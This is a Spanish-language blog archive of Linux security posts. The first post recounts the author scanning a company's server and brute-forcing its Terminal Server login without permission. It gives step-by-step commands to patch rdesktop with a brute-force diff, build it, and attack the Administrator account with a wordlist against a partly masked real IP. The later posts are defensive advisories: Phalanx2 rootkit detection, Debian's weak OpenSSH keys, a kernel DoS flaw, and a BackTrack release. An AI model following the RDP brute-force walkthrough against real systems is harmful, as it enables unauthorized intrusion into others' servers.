Archive for the ‘GNU/Linux’ Category

Cracking pass of MS Terminal Server

noviembre 10, 2010

Rdesktop for Terminal Server

Hace unas semanas escaneaba un Web Server y me sorprendí al ver que tenía muchos puertos abiertos, 110, 21, 22 25, 443, 3389, 80, 993, 995 realmente para publicitarse como una empresa sería y segura no creí que tenga un buen esquema de seguridad con muchos servicios y puertos abiertos en un mismo Server.

Decidí probar con el 3389 de Terminal Server para saber si soportaba conexión remota a través de mi conexión ADSL, pues si soportaba, solo hacía falta saber la contraseña.

Atacando al RDP MS Terminal Server usando Backtrack 4

1. Actualizamos y parchamos Rdesktop.

Descargamos:

Rdesktop 1.5
http://prdownloads.sourceforge.net/rdesktop/rdesktop-1.5.0.tar.gz

RDP Brute force patch r805
http://www.foofus.net/jmk/tools/rdp-brute-force-r805.diff

Creamos una carpeta para las descargas

mkdir rdesk

A continuación, descomprimimos.

tar -xvzf rdesktop-1.5.0.tar.gz
cd rdesktop-1.5.0

Parchamos rdesktop para que pueda hacer el ataque de fuerza bruta

root@bt:~/rdesk/rdesktop-1.5.0# patch -p1 -i rdp-brute-force-r805.diff
patching file Makefile.in
patching file configure
patching file orders.c
patching file orders.h
patching file rdesktop.c
patching file rdesktop.h
patching file rdp.c
patching file secure.c
patching file xkeymap.c

Compilamos e instalamos

./configure
make
make install

Ahora ya tenemos la nueva versión de rdesktop lista para hacer el ataque

2. Realizando el ataque

En la línea de comandos escribimos:

#rdesktop -n Administrador -p /ruta/wordlist.lst 72.28.xxx.xxx

Anuncios

Aumentan ataques contra sistemas basados en Linux

agosto 27, 2008

US-CERT ha publicado alerta sobre un aumento de ataques en sistemas basados en Linux, usando para ellos claves SSH comprometidas referidas al fallo de Debian en la generación de claves SSH.

Un usuario local puede ejecutar “exploits” contra las vulnerabilidades del kernel y logra así obtener privilegios de “root”, una vez tomado el control (root) podrá instalar el rootkit “phalanx2”.

Phalanx2 es un derivado de un antiguo rootkit llamado “phalanx”. Tanto Phalanx2 como los scripts de soporte para el rootkit están configurados para robar de sistemáticamente claves SSH del sistema comprometido, las claves conseguidas son utilizadas para atacar nuevos sistemas.

US-CERT publica algunas recomendaciones para detectar Phalanx2:

1. “ls” no muestra la carpeta “/etc/khubd.p2/”, pero se puede acceder usando “cd /etc/khubd.p2”.
2. “/dev/shm/” puede contener archivos de ataque.
3. Cualquier carpeta llamada “khubd.p2” se oculta del comando “ls”, pero es posible acceder usando el comando “cd”.

Cambios en la configuración del rootkit pueden modificar las indicaciones señaladas anteriormente; otros métodos de detección pueden incluir búsquedas de procesos ocultos y comparar los resultados contenidos en “/etc” con el numero de carpetas mostradas por “ls”.

US-CERT recomienda a los administradores las siguientes acciones para poder mitigar los riesgos:

1. Identificar y revisar proactivamente los sistemas que usen claves SSH como parte de procesos automáticos. Estas claves típicamente no suelen contar con contraseñas.
2. Utilizar las claves con contraseña para reducir el riesgo en caso de que una clave haya sido comprometida.
3. Revisar las rutas de entrada a los sistemas con acceso a Internet y verificar que se encuentran correctamente actualizados.

Si su equipo está comprometido:

1. Deshabilitar la autenticación SSH en el sistema afectado, siempre que sea posible.
2. Revisar y auditar las claves SSH de los sistemas afectado.
3. Notificar a los propietarios de las claves sobre la posibilidad que su clave haya sido comprometida.

Referencias:

SSH Key-based Attacks

Lanzan Backtrack 3 Beta

junio 20, 2008

Se ha liberado Backtrak3, lo novedoso es que en la pagina de remote-exploit publicado tres versiones, una imagen iso para grabar en CD, otra para correr en memorias USB y una imagen optimizada para correr sobre VMWare.    

Backtrack la distribución de GNU/Linux en version Live CD especializada en Auditoría de Seguridad Informática y con muchos seguidores en en mundo de la seguridad en esta nueva version beta se caracteriza por la contar con kernel 2.6.15.5 dándole mejor soporte para Core Duo, asimismo, aumenta su compatibilidad con más tarjetas de red inalámbricas y actualiza su repositorios de exploits.

Backtrack 3

Pueden ver algunos screenshots desde la pagina de remote-exploit

http://www.remote-exploit.org/backtrack_screenshots.html

Enlaces de Descarga:

Description: CD Image
Size: 695 MB
http://www.remote-exploit.org/cgi-bin/fileget?version=bt3-cd

Description: USB Version (Extended)
Size: 784 MB
http://www.remote-exploit.org/cgi-bin/fileget?version=bt3-usb

Description: VMware Image
Size: 689 MB
http://www.remote-exploit.org/cgi-bin/fileget?version=bt3-vm

Parche de Debian provoca vulnerabilidad de openSSH

mayo 13, 2008

Una vulnerabilidad gravisima en OpenSSH encontrada por Luciano Bello, que hace predecible (lease, vulnerable), las ssh keys generadas desde el 2006 en adelante, en Debian y derivados (Ubuntu, por ejemplo).

Fue anunciado en Debian y Ubuntu, y hay actualizaciones disponibles para ambos.

Si usan keys ssh, es indispensable que actualicen a las ultimas versiones de los paquetes afectados, y regeneren sus keys.

Hay un paquete que se instala con la actualizacion con el que pueden ver si estan afectados:

ssh-vulnkey -a

Sino, pueden probar con:

wget http://security.debian.org/project/extra/dowkd/dowkd.pl.gz
gunzip dowkd.pl.gz
chmod +x dowkd.pl
./dowkd.pl file /etc/ssh/ssh_host_{dsa,rsa}_key.pub 2>/dev/null

Si dice que tu clave es debil:

sudo dpkg-reconfigure -plow openssh-server

La vulnerabilidad no es de OpenSSH en si mismo, sino de un parche aplicado en Debian, que elimina la generar informacion random a la hora de generar los keys.

Fuente:
http://www.kbglob.com/gnulinux/….

DoS en el kernel 2.6.x de Linux

febrero 21, 2007

Linux KernelSe ha encontrado una vulnerabilidad en el kernel de Linux, que podría permitir un ataque de denegación del servicio (DoS).Este fallo se debe a un error en la función “nfsaclsvc_release_getacl ()” de fs/nfsd/nfs2acl.c que no libera adecuadamente el puntero que manejo las peticiones ACCESS en NFSACL 2. Esto puede permitir explotar un sistema vulnerable, ocasionando un ataque DoS.

 

Versiones Afectadas:

Linux Kernel, versiones anteriores a 2.6.20.1
Linux Kernel, versiones anteriores a 2.6.19.4
Linux Kernel, versiones anteriores a 2.6.18.7

Solucion:

Actualizar, el kernel de las versiones afectadas, 2.6.20.1, 2.6.19.4, 2.6.18.7

http://www.kernel.org

Más información:
http://www.frsirt.com/english/advisories/2007/0660